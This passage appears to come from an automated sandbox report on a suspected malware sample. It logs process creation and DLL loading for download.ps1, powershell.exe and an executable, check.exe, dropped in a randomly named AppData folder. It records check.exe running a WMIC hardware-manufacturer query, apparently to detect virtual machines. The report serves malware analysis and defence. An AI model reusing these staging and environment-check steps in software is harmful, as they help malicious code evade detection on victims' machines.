Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeProcess created: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe "C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe"
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get manufacturer"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get manufacturer
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get manufacturer"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get manufacturer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: libffi-8.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: qt5core.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: msvcp140.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: msvcp140_1.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: libcrypto-3.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: libssl-3.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: pdh.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: qt5widgets.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: qt5gui.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: qt5gui.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: d3d9.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: dataexchange.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: dcomp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: libffi-8.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: qt5core.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: netapi32.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: msvcp140.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: msvcp140_1.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: vcruntime140_1.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: msvcp140.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: libcrypto-3.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: libssl-3.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: powrprof.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: pdh.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: umpdc.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: qt5widgets.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: qt5gui.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: qt5gui.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: dwmapi.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: d3d11.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: dxgi.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: dxgi.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: d3d9.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: d3d10warp.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: dataexchange.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: dcomp.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: twinapi.appcore.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: libffi-8.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: qt5core.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: netapi32.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: msvcp140.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: msvcp140_1.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: vcruntime140_1.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: vcruntime140_1.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: libcrypto-3.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: libssl-3.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: powrprof.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: pdh.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: umpdc.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: qt5widgets.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: qt5gui.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: qt5gui.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: dwmapi.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: d3d11.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: dxgi.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: dxgi.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: d3d9.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: d3d10warp.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: dataexchange.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: dcomp.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: twinapi.appcore.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\InProcServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: download.ps1Static file information: File size 51289381 > 1048576
Source: Binary string: C:\Users\qt\work\qt\qtsvg\plugins\iconengines\qsvgicon.pdb source: check.exe, 00000004.00000003.2222374412.000001C184424000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtsvg\plugins\imageformats\qsvg.pdb source: check.exe, 00000004.00000003.2223763846.000001C184424000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\plugins\generic\qtuiotouchplugin.pdb source: check.exe, 00000004.00000003.2222127490.000001C184424000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: d:\agent\_work\1\s\\binaries\amd64ret\bin\amd64\\msvcp140.amd64.pdb source: check.exe, 00000005.00000002.2761324036.00007FF8B83B5000.00000002.00000001.01000000.00000013.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\plugins\imageformats\qico.pdb source: check.exe, 00000004.00000003.2223434926.000001C184424000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.15 3 Sep 20243.0.15built on: Wed Sep 4 15:52:04 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL || WITHIN_ARENA(temp->next)assertion failed: (char **)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) || WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == 